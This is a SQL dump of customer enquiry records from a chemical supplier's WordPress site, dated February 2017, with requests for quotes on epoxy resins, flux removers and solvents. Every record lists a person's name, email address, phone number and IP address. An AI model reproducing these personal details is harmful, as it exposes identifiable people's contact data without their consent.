INSERT INTO `wp_enquiry_detail_new` VALUES (538, 'Amanda Ruyack', 'aruyack@villanova.edu', 'Hi,\nI would like a price quote for a specific amount of this resin. I am an undergraduate engineering student and am conducting research. \n\nThank you. ', '845531-8542', 'Price Quote', '73.233.56.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"977";s:5:"title";s:13:"EPON™ 58005";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-58005.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 15:41:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (539, 'Jamie Cutright', 'J.Cutright@matrixcomp.com', 'Good Morning,\nLooking for this p/n to purchase ASAP....', '321633-4480', 'Matrix Composites RFQ', '71.46.213.186', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"425";s:5:"title";s:21:"ReleaSys 89 (Aerosol)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_278844821.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 15:42:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (540, 'Tomomi Ichinose', 'tichinos@med.wayne.edu', 'Please send me a quote,and/or let me know if I can order by phone. Thanks.', '313421-8449', 'order Epon Resin 828', '146.9.23.159', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 15:43:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (541, 'Amanda Ruyack', 'aruyack@villanova.edu', 'Hi, \nI would like a price quote on a specific amount of this resin. I am an undergraduate engineering student conducting research, \n\nThank you. ', '845531-8542', 'Price Quote', '73.233.56.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"924";s:5:"title";s:13:"EPON™ 1001F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 15:43:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (542, 'Amanda Ruyack', 'aruyack@villanova.edu', 'Hi, \nI would like a price quote on a specific amount of this resin. I am an undergraduate engineering student conducting research, \n\nThank you. ', '845531-8542', 'Price Quote', '73.233.56.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"900";s:5:"title";s:11:"EPON™ 872";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 15:43:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (543, 'Erica Malloch', 'emalloch@illinois.edu', 'Hello, \n\nCan I please obtain a quote for the following items:\n\n1. Epikure 3274, 1 quart\n2. EPON 828, 1 quart\n3. Epon 813, 1 quart\n\nThanks,\nErica\n\n', '217244-0052', 'Price quotes', '130.126.255.215', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1191";s:5:"title";s:15:"EPIKURE™ 3274";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 19:11:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (544, 'suzanne walker-bell', 'suzanne.walker-bell@halliburton.com', 'Hi, \nI would like to get a quote on two cases of MS-222n \nthanks, \nSuzanne', '818376-7204', '2 cases of MS-222n', '134.132.52.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 21:57:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (545, 'Rachel Gehringer', 'rgehringer@ku.edu', 'Could you please give me a price quote for the epon resin 815C \n\nThanks', '785864-3609', 'price quote?', '129.237.102.236', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 22:31:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (546, 'Rebecca VanDerpoel', 'rebecca.vanderpoel@capellahealth.com', 'need the smallest tube you have. thanks in advance. ', '843339-4150', '1525 VPF ', '165.214.11.75', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"954";s:5:"title";s:8:"VPF 1525";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_373295623.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 14:22:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (547, 'Fred Shouldice', 'fshouldice@tpsassociates.us', 'Please provide a Quote for 18 cans MS-465C.\nThank you!', '732657-8501', 'Quote for MS-465C', '75.147.84.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:7:"MS-465C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 15:52:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (548, 'VIDYA RAJEEV', 'vidya.rajeev@sunmrotech.com', 'Please quote for below with MOQ\n\nMS460/C02, Conformal Coating\n', '', 'RFQ', '217.164.187.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 16:08:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (549, 'Rick Piccerillo', 'rick.piccerillo@microtrac.com', 'I was inquiring about the cost of a case of these dusters.', '215619-9920', 'MS-222N', '70.91.5.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 16:41:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (550, 'Kyle', 'kylej23@verizon.net', 'A quote on a single gallon would be appreciated!', '', 'Price Quote', '63.66.64.247', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 17:07:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (551, 'Kyle', 'kylej23@verizon.net', 'A quote on a single gallon would be appreciated!  ', '', '', '63.66.64.247', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"970";s:5:"title";s:12:"EPON™ 8021";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8021.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 17:11:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (552, 'Kyle', 'kylej23@verizon.net', 'A quote on a single gallon would be great.  Thank you!', '', 'Gallon quote', '63.66.64.247', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"903";s:5:"title";s:11:"EPON™ 813";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-813.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 17:21:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (553, 'Jane', 'precigenome@gmail.com', 'I would like to inquire the quote for Krytox FSH and Krty FSL  of 1kg, 5kg and 20 kg scale.\n\nThanks', '', '', '23.24.214.46', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 19:10:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (554, 'Marcos Aguirre', 'maguirre@psemc.com', 'Hello,\nPlease quote the min order for # MS-555, 1-\nthank you,', '831630-5342', 'RFQ # MS-555', '208.95.94.67', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-21 19:42:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (555, 'davefischer', 'davefischer@excaliburdriving.com', 'Would like to purchase one gallon of 862.', '763229-1457', '', '66.41.185.237', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-22 02:14:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (556, 'davefischer', 'davefischer@excaliburdriving.com', 'Would like to purchase this product', '', '', '66.41.185.237', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-22 02:18:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (557, 'Amy French', 'amyflat16@gmail.com', 'Price', '269501-5496', '', '68.60.119.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"783";s:5:"title";s:7:"GPL 202";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_333727961.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-22 17:14:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (558, 'Robert Tuttle', 'rtuttle@devarinc.com', 'May Devar Inc. please receive the safety data sheets for both MS460H (spray can) and MS462 (jar). We have old safety data sheets. (MS460C &amp; N)', '203368-6751', 'SDS Request', '96.56.92.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-22 18:36:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (559, 'Tammy A Petersen', 'tammyp@reliancecm.com', 'I am looking for a new flux cleaner that will work as well if not better than the "Cybersolv 141-R" by KYZEN. They have changed their product and it is not nearly as effective as it was. If it is at all possible I would like a sample of your product. We are a contract manufacturer and use quite a bit of the flux remover, if I can find one that works well. Thank you for your time and help with this matter.', '541758-8242', 'New Cleaner', '74.95.42.133', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-22 22:37:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (560, 'Sebastian Rozo', 'sebastiandrozo@gmail.com', 'Hello,\nMy name is Sebastian Rozo I\'m a graduate student at San Jose State University in the material engineering department.\nI\'m studying composite materials using epoxy resins, I have the epon 828 epoxy resin and need a curing agent. \n\nPlease let me know price and availability.', '415235-3583', 'Epikure W', '172.58.35.217', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 01:41:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (561, 'Jeff Mann', 'jefferymann@sbcglobal.net', 'I am looking for a mold release solution for a rock mold issue for hobbyists.  I have the mold of a foaming resin variety, plan to spray this on without heat, allow to dry then apply a coat of varnish gloss spray paint for layer one of the casting.  Layer two is a thin plastic result from resin along with layer 3 of a resin foam.  These should pull out after they harden and may heat up during the non toxic cure time.  No heat applied.  I would like to use the delicate molds 30-50 times.  COST?', '661285-3275', 'Cost per smallest unit? Or by gallon?', '23.112.125.90', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"423";s:5:"title";s:21:"ReleaSys 88 (Aerosol)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Airplane-window-ReleaSys88.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 03:36:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (562, 'Scott Albert', 'scott.albert@navy.mil', 'Epi-Cure 3140 (Miller-Stephenson)\nEpon Epoxy Resin 828 (Miller-Stephenson)\n\nCost per unit and lead times please\n', '', 'Looking for equivilent of items in message body', '138.162.0.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"891";s:5:"title";s:12:"EPON™ 8280";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8280.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 14:50:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (563, 'Aaron Fletcher', 'afletcher@reliancecm.com', 'Hello,\n\nI am looking for a Flux Remover and came across your product, MS-555. What would be the price for one can of this?\n\nThank you,\n\n~Aaron Fletcher', '', 'Price Inquiry', '74.95.42.133', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 15:14:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (564, 'nick jeannette', 'nicholas.j.jeannette@dupont.com', 'my name is nick jeannette and I am with the Dupont Company in Wilmington delaware\nI am trying to purchase or obtain a  small sample of EPON Resin 828  (100grms or 100 mls)\ncould you please contact  me with prices and how to  purchase', '302695-6655', 'purchase or  obtain sample', '206.16.224.134', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 16:08:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (565, 'Benjamin KImball', 'Benjamin.Kimball@OrbitalATK.com', 'I need a quote for product:\nNSN 7930-01-064-5179\nMS-260 Plastic-Glass-Metal\nQauntity 6 (16 oz. Aerosol)  cans', '508589-5129', 'RFQ fro Orbital ATK', '192.107.246.119', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 17:53:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (566, 'Scott Shadis', 'sshadis@thorlabs.com', 'Can I purchase these syringes Separate from the grease? ', '973300-3071', 'Syringes included with the GPL206', '67.238.78.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:2:"25";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 19:40:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (567, 'Carl Sims', 'csims@idexcorp.com', 'Robert Young of chemours has recommended this product for our purpose. We have been using some other ptfe mold release agents from you, but would like to consider Chemours recommendation.', '707588-2053', 'Vydax NRT 960', '65.216.74.168', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1683";s:5:"title";s:16:"Vydax™ NRT 960";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-vydax-dryfilm-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-23 22:42:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (568, 'Charles Glotzbach', 'charles.glotzbach@us.af.mil', 'Is the MS 582N equal to the liquid version of MS-582 DPMS-C0723B? cleaning solvent?  Send pricing please.', '478222-5207', 'MS 582N', '137.244.215.56', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-24 15:03:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (569, 'Kevin Arbuthnot', 'kevin.arbuthnot@sandc.com', 'Please provide pricing for pint sizing of Epon 828.\n\nthanks, ', '416670-8015', 'Pricing', '192.34.199.15', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-24 15:13:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (570, 'Jessica Dominic', 'tuf73360@temple.edu', 'We are looking to insert a 15" coiled wire into silastic tubing using the Vertrel XSi.', '215589-4730', 'Vertrel', '129.32.224.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2344";s:5:"title";s:12:"Vertrel X-Si";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_470033000.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-24 16:49:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (571, 'Jessica Dominic', 'tuf73360@temple.edu', 'Looking for the price of a quart or gallon', '215589-4739', 'Vertrel', '129.32.224.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2344";s:5:"title";s:12:"Vertrel X-Si";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_470033000.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-24 16:51:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (572, 'Edgar Busto', 'edgar.busto@litens.com', 'Would like to know the price of a 55 gall of Vertrel MCA', '416400-2136', 'Price of a 55 gal of Vertrel MCA', '72.142.25.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-24 20:51:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (573, 'Stephen Crowe', 'Wellworthproducts@yahoo.com', 'Could you please quote 1 case of 12 cans of aerosol for me and included shipping to zip code 14067.  Thank You', '716435-9047', 'Vertrel MCA aerosol', '66.66.185.128', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-24 23:20:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (574, 'Dylan Ross', 'ross7technologies@gmail.com', 'Hello I\'m working with glass molds an uv light. Is this mold release transparent or is there any product that is. I would prefer permanent or smi if possible ', '760475-1611', 'Mold release ', '67.171.189.203', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-26 17:52:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (575, 'jeff', 'jeff.fogt@emerson.com', 'looking to buy  a case of MS-550, need to know pricing and quantity per case.\nalso need to know if you accept company credit cards.\n\nthank you, jeff fogt', '', '', '144.191.148.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3358";s:5:"title";s:17:"MS-550N / MS-552N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_543794323.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-27 11:10:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (576, 'Linda Ye', 'lye@itwcce.com', 'I am a research chemist in ITWCCE. I would like to have small amount of your product,  MS-470C for my project. Do you offer free sample? or what is the smallest amount that I can buy?', '770424-4888', 'MS-470C sample', '107.7.210.28', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-27 13:50:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (577, 'John Reali', 'john.p.reali@nasa.gov', 'Hello,\nKennedy Space Center currently uses MS-755L for flux removal after soldering. There\'s a Center-wide initiative to find bio-based alternatives to non-flight components. For defluxer our target is 56% bio-based composition. Do you offer a bio-based alternative to MS-755L currently or in development? \n\nWe don\'t perform batch operations, so we need a cleaner on the go and our techs like the spray/aerosol option of MS-755L since it doesn\'t damage the solder like wiping/brushing can.\n\nThank you', '321861-4904', 'Bio-based alternative for MS-755L', '163.206.131.113', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1690";s:5:"title";s:7:"MS-755L";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-755l-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-27 14:01:22', '', NULL, '', '', '', NULL, '', ''); 
